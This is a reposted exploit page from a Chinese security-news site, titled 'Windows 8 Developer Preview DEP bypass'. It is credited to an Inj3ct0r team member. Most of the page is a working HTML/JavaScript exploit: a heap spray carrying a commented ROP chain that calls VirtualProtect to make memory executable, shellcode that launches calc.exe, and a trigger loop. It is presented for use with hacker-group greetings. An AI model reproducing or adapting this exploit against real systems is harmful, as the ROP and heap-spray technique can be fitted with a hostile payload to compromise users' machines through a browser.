首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Windows 8 Developer Preview DEP bypass 来源：http://r00tw0rm.com 作者：Angel 发布时间：2012-06-14   1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0     _                   __           __       __                     1 1   /' \            __  /'__`\        /\ \__  /'__`\                   0 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1 1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1 1                  \ \____/ >> Exploit database separated by exploit   0 0                   \/___/          type (local, remote, DoS, etc.)    1 1                                                                      1 0  [+] Site            : 1337day.com                                   0 1  [+] Support e-mail  : submit[at]1337day.com                         1 0                                                                      0 1               #########################################              1 0               I'm Angel Injection member from Inj3ct0r Team          1 1               #########################################              0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 [+] Windows 8 Developer Preview DEP bypass [-] Found by Angel Injection [-] Link: www.microsoft.com [-] Security -::RISK: High [-] platforms: Windows [-] http://1337day.com http://r00tw0rm.com http://i313.cc [-] Greetz to 1337day.com(r0073r) Team i313.cc(Sn!PEr_R00T,Lion) r00tw0rm.com Team (CrosS And All Members) What Is Going On?? Note: Exploit Found: http://www.dis9.com/windows-dep-bypass.html <html> <!-- ROP completed---> <head> <Title>Windows 8 Calc payload</title> <script type="text/javascript"> function ignite()    {     var carpet = 0x200;     var vftable = unescape("\x00% u0c10");     var pLand = "% u00fd% u0c10";     var pShell = "% u0000% u0c10";     var oldProt = "% u0000% u0c10";     var heap = unescape("% u0101% u0102"                     +"% u0008% u0c10"                     +"% u0105% u0106"                     +"% u10c2% u7c34"//"% u0107% u0108" pop ecx;pop ecx;ret                     +"% u0109% u010a"//                     +"% u3134% u6d32"//"% u010b% u010c"//"% u6643% u6d6a" // mov eax,[esi]                     +"% u787f% u6d32"//"% u010d% u010e"// xchg eax,esi;aam 0ff;dec ecx;ret                     +"% u7b72% u6d83"//"% u010f% u0111" // pop edx;ret                     +"% u0000% u0c10"//% u0112% u0113" // will be popped in edx //                     +"% u2a30% u6d7f"//"% u0114% u0115" // mov ecx,esi;call [edx+50]                     +pLand//"% u0116% u0117" // Address in shellcode to land change it accordingly                     +"% ue8d4% u6d7f"//"% u0118% u0119"    // mov [ecx],eax;pop ebp;ret                     +"% u011a% u011b"// will be popped in ebp                     +"% u1b02% u7c34"//"% u011c% u011d" // dec ecx;ret                     +"% u1b02% u7c34"//"% u011e% u011f" // dec ecx;ret                     +"% u1b02% u7c34"//"% u0120% u0121" // dec ecx;ret                     +"% u1b02% u7c34"//"% u0122% u0123" // dec ecx;ret                     +"% u4edc% u7c34"//"% u0122% u0123" // pop eax;ret                     +oldProt//"% u0124% u0125" // pOldProtection                     +"% ue8d4% u6d7f"//"% u0126% u0127" // mov [ecx],eax;pop ebp;ret                     +"% u4edb% u7c34"//"% u0128% u0129" // pop ebx;pop eax;ret // needed in initial phase.                     +"% u1b02% u7c34"//"% u012a% u012b" // dec ecx;ret                     +"% u1b02% u7c34"//"% u012c% u012d" // dec ecx;ret                     +"% u4edb% u7c34"//"% u012e% u012f" // pop ebx;pop eax;ret                     +"% u2643% u7c34"//"% u0130% u0131" // xchg eax,esp;pop edi;add byte ptr ds:[eax],al;pop ecx,ret                     +"% u0040% u0000"//"% u0132% u0133" // newProptection = PAGE_READ_WRITE_EXECUTE                     +"% u1b02% u7c34"//"% u0134% u0135" // dec ecx;ret                     +"% u1b02% u7c34"//"% u0136% u0137" // dec ecx;ret                     +"% ue8d4% u6d7f"//"% u0138% u0139" // mov [ecx],eax;pop ebp;ret                     +"% u013a% u013b"// will be popped in ebp                     +"% u1b02% u7c34"//"% u013c% u013d" // dec ecx;ret                     +"% u1b02% u7c34"//"% u013e% u013f" // dec ecx;ret                     +"% u1b02% u7c34"//"% u0140% u0141" // dec ecx;ret                     +"% u1b02% u7c34"//"% u0142% u0143" // dec ecx;ret                     +"% u4edc% u7c34"//"% u0144% u0145" // pop eax;ret                     +"% u0000% u0010"//"% u0146% u0147" // Size                     +"% ue8d4% u6d7f"//"% u0148% u0149" // mov [ecx],eax;pop ebp;ret                     +"% u014a% u014b"// Will be popped in ebp.                     +"% u1b02% u7c34"//"% u014c% u014d" // dec ecx;ret                     +"% u1b02% u7c34"//"% u014e% u014f" // dec ecx;ret                     +"% u1b02% u7c34"//"% u0150% u0151" // dec ecx;ret                     +"% u1b02% u7c34"//"% u0152% u0153" // dec ecx;ret                     +"% u4edc% u7c34"//"% u0144% u0145" // pop eax;ret                     +pShell//"% u0146% u0147" // Address Of Shellcode block to change protection.                     +"% ue8d4% u6d7f"//"% u0148% u0149" // mov [ecx],eax;pop ebp;ret                     +"% u014a% u014b"// Will be popped in ebp. /*                    +"% u1b02% u7c34"//"% u014c% u014d" // dec ecx;ret                     +"% u1b02% u7c34"//"% u014e% u014f" // dec ecx;ret                     +"% u1b02% u7c34"//"% u0150% u0151" // dec ecx;ret                     +"% u1b02% u7c34"//"% u0152% u0153" // dec ecx;ret */                    +"% u4cc1% u7c34"//"% u0154% u0155" // pop eax;ret                     +"% u9611% u7c34"//"% u0156% u0157" // will be popped in eax. pop edi;pop ebx;pop ebp;ret                     +"% u347a% u7c34"//"% u0158% u0159" // push esi;push edi;call eax                     +"% u4edc% u7c34"//"% u015a% u015b" // pop eax;ret                     +"% u00e0% u0c10"//"% u015c% u015d" // will be popped in eax.                     /* Need to fix the ebp for proper landing on shellcode */                     +"% uc420% u6d99"// dec ebp;ret                     +"% uc420% u6d99"// dec ebp;ret                     +"% uc420% u6d99"// dec ebp;ret                     +"% uc420% u6d99"// dec ebp;ret                     +"% u1f0a% u7c34"//"% u015e% u015f" // mov esp,ecx;mov ecx[eax];mov eax,[eax+4];push eax;ret                     +"% u0160% u0161"                     +"% u28dd% u7c35"//"% u0162% u0163" // VirtualProtect                     +"% u0164% u0165"                     +"% u0166% u0167"                     +"% u0168% u0169"                     +"% u016a% u016b"                     +"% u016c% u016d"                     ) /* Shellcode : */    +unescape("% u9090% u9090% u9090% u9090"                     +"% u585b" // pop ebx;pop eax;                     +"% u0a05% u0a13% u9000" // add eax,0a130a                     +"% u008b" // mov eax,[eax]                     +"% u056a" // push 05                     +"% uc581% u0128% u0000" // add ebp,114                     +"% u9055" // push ebp;nop                     +"% u1505% u04d6% u9000" // add eax,4d615                     +"% ud0ff" // call eax                     +"% uBBBB% uCCCC% uDDDD% uEEEE" /* command: */        +"% u6163% u636c% u652e% u6578% u0000% ucccc"    // calc.exe                     );         var vtable = unescape("\x04% u0c10");         while(vtable.length < 0x10000) {vtable += vtable;}         var heapblock = heap+vtable.substring(0,0x10000/2-heap.length*2);         while (heapblock.length<0x80000) {heapblock += heap+heapblock;}         var finalspray = heapblock.substring(0,0x80000 - heap.length - 0x24/2 - 0x4/2 - 0x2/2);         var spray = new Array();         for (var iter=0;iter<carpet;iter++){             spray[iter] = finalspray+heap;         } /* vulnerability trigger : */         var arrobject = [0x444444444444];         for(;true;){(arrobject[0])++;} } </script> </head> <body> <applet src="test.class" width=10 height=10></applet> <input type=button value="Ignite" onclick="ignite()" /> </body> </html>   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Opera 12 Local Arbitrary Downl ·XM Easy Personal FTP Server v ·Wyse Machine Remote Power off ·Wyse Machine Remote Power off ·WordPress plugin Foxypress upl ·ESRI ArcGIS 10.0.X / ArcMap 9 ·Adobe Illustrator CS5.5 Memory ·Edimax IC-3030iWn Authenticati ·MS12-037 Internet Explorer Sam ·Apple iTunes 10.6.1.7 M3U Play ·ComSndFTP 1.3.7 Beta USER Buff ·F5 BIG-IP SSH Private Key Expo   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved